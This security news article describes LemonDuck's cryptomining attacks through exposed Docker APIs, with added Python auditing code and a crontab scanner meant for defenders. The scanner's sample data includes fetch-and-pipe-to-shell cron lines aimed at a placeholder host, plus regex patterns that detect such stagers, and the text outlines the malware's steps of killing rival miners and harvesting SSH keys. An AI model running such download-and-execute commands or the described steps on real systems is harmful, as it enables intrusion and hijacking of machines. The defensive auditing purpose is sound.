Security researchers from CrowdStrike have released a whitepaper on the ongoing attacks against the Docker API on Linux servers. The threat actors are using the LemonDuck botnet to run mining operations for the Monero cryptocurrency. For initial compromise, the attackers look for exposed Docker APIs.
Exposed Docker API is the key
Docker is a platform for building, running, and managing containerized workloads, and it provides APIs for automation. It is widely used to run container workloads in the cloud. Misconfigured cloud instances can expose the Docker API to the network, which is exactly what LemonDuck operators are currently scanning for. An exposed API lets the threat actors run mining malware inside the target container. The attackers may also be able to escape from the container by abusing privileges and other misconfigurations in the cloud environment.
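As an added example (not code from the article or from CrowdStrike), the following Python audits the two misconfigurations this paragraph describes: a dockerd daemon.json that listens on TCP without client-certificate authentication, and a container HostConfig whose settings make container escape possible. The sample configurations are constructed; hosts, tlsverify, Privileged, PidMode and Binds are real dockerd/Docker Engine API keys, the paths under /etc/docker are placeholders.

```python
import json
from urllib.parse import urlsplit

# Constructed sample of /etc/docker/daemon.json (not from the article): the API is
# bound to every interface on 2375 with no TLS at all.
EXPOSED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})

# Constructed hardened counterpart: TCP listener only accepts clients that present
# a certificate signed by the configured CA (tlsverify). Paths are placeholders.
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

LOOPBACK = {"127.0.0.1", "localhost", "::1"}


def audit_daemon_config(daemon_json: str) -> list[str]:
    """Return one finding per TCP listener that exposes the API to the network.

    "tls": true alone only encrypts the transport; without "tlsverify" any
    client that can reach the port can drive the daemon, so it is still flagged.
    """
    cfg = json.loads(daemon_json)
    findings = []
    client_auth = bool(cfg.get("tlsverify", False))
    for host in cfg.get("hosts", []):
        parts = urlsplit(host)
        if parts.scheme != "tcp":
            continue  # unix:// and fd:// listeners are not reachable over the network
        bound_to = parts.hostname or "0.0.0.0"  # "tcp://:2375" means all interfaces
        if bound_to in LOOPBACK:
            continue
        if not client_auth:
            findings.append(f"{host}: API reachable without client certificate auth")
    return findings


# Constructed HostConfig objects as returned by the Docker Engine API's
# container inspect call (not taken from the article).
ESCAPE_PRONE_HOST_CONFIG = {
    "Privileged": True,
    "PidMode": "host",
    "Binds": ["/:/host:rw"],
}
SAFE_HOST_CONFIG = {
    "Privileged": False,
    "PidMode": "",
    "Binds": ["/srv/data:/data:ro"],
}


def audit_host_config(host_config: dict) -> list[str]:
    """Flag HostConfig settings that hand a container a path out to the host."""
    findings = []
    if host_config.get("Privileged"):
        findings.append("Privileged: container gets all capabilities and host devices")
    if host_config.get("PidMode") == "host":
        findings.append("PidMode=host: container shares the host PID namespace")
    for bind in host_config.get("Binds", []):
        src = bind.split(":", 1)[0]
        if src == "/" or src == "/var/run/docker.sock":
            findings.append(f"Binds {bind}: host root filesystem or Docker socket mounted")
    return findings


if __name__ == "__main__":
    for name, cfg in (("exposed", EXPOSED_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(name, audit_daemon_config(cfg))
    for name, hc in (("escape-prone", ESCAPE_PRONE_HOST_CONFIG), ("safe", SAFE_HOST_CONFIG)):
        print(name, audit_host_config(hc))
```

On a real host, feed audit_daemon_config the contents of /etc/docker/daemon.json (and check any -H flags in the dockerd systemd unit, which this example does not parse) and audit_host_config the HostConfig object from the container inspect endpoint of each running container.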
All of the competing mining groups’ processes are killed to maximize LemonDuck’s mining efficiency
After gaining initial access through the Docker API, the attackers run a malicious container that downloads the core.png file, which is actually a disguised Bash script. The file is downloaded from the t.m7n0y[.]com domain, which LemonDuck used in its previous campaigns. The core.png Bash script sets up a Linux cron job inside the container to download another file, a.asp, which is also a Bash script. Besides disabling the Alibaba Cloud monitoring service that provides security, the a.asp script carries out the following steps:
- Kills processes whose names match known mining pools, rival crypto-mining groups, etc.
- Kills daemons such as crond, sshd, and syslog by looking up their process IDs.
- Deletes the known IOC file paths of competing crypto-mining groups to disrupt any existing operation.
- Kills connections that are ESTABLISHED or in progress (SYN_SENT) to the known C2 servers of competing crypto-mining groups.
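The cron stage described above (core.png writing a cron job that fetches and runs a.asp) leaves a recognizable trace in crontab files. As an added example, not code from the article or from CrowdStrike, the following Python scans crontab text for entries that download from a URL and either pipe the response into a shell or execute the saved file from a temporary directory. The crontab lines are constructed and the domain is a placeholder; the real indicator from the article could be added to an allow/deny list on top of this pattern match.

```python
import re

# Constructed crontab sample (not from the article). One benign entry, two entries
# shaped like a download-and-execute stager; the domain is a placeholder.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh --quiet
*/5 * * * * curl -fsSL http://cron.example.invalid/a.asp | bash
*/10 * * * * wget -q -O /tmp/.x http://cron.example.invalid/core.png && bash /tmp/.x
"""

# A curl/wget invocation that fetches an http(s) URL within the same command.
DOWNLOADER = re.compile(r"\b(curl|wget)\b[^|&;]*https?://\S+", re.I)
# Output piped straight into a shell interpreter.
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|z|da)?sh\b")
# A shell launched on a file in a world-writable scratch directory after the fetch.
EXEC_DOWNLOADED = re.compile(r"(&&|;)\s*(ba)?sh\s+(/tmp|/dev/shm|/var/tmp)\S*")


def flag_download_and_exec(crontab_text: str) -> list[str]:
    """Return the crontab lines that fetch remote content and run it."""
    flagged = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # comments and blank lines carry no command
        if DOWNLOADER.search(line) and (
            PIPE_TO_SHELL.search(line) or EXEC_DOWNLOADED.search(line)
        ):
            flagged.append(line)
    return flagged


if __name__ == "__main__":
    for entry in flag_download_and_exec(SAMPLE_CRONTAB):
        print("suspicious cron entry:", entry)
```

Run it over /etc/crontab, the files under /etc/cron.d and each user's crontab, inside containers as well as on the host; a legitimate job that fetches a script and runs it will also match, so the output is a review list, not a verdict.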
After cleaning up the processes and connections of other crypto-miner groups, the a.asp script downloads the XMRig miner and starts mining. It uses a proxy pool to hide the crypto wallet addresses. LemonDuck then searches the file system for SSH keys to log in to other hosts and spread.
Properly restricting access to the Docker API on cloud instances is currently the only way to avoid LemonDuck crypto-mining attacks.